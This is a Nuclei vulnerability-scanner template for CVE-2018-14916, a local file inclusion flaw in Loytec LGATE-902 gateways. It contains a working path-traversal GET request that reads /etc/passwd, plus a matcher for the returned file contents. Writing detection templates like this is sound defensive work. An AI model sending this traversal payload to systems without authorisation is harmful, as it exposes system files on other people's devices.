nuclei-templates/cves/2018/CVE-2018-14916.yaml

37 lines
1.1 KiB
YAML

id: CVE-2018-14916
info:
name: Loytec LGATE-902 <6.4.2 - Local File Inclusion
author: 0x_Akoko
severity: critical
description: Loytec LGATE-902 versions prior to 6.4.2 suffers from a local file inclusion vulnerability.
reference:
- https://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
- https://nvd.nist.gov/vuln/detail/CVE-2018-14916
- http://packetstormsecurity.com/files/152453/Loytec-LGATE-902-XSS-Traversal-File-Deletion.html
- https://seclists.org/fulldisclosure/2019/Apr/12
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H
cvss-score: 9.1
cve-id: CVE-2018-14916
cwe-id: CWE-732
tags: cve2018,loytec,lfi,packetstorm,seclists,cve
requests:
- method: GET
path:
- "{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/05/12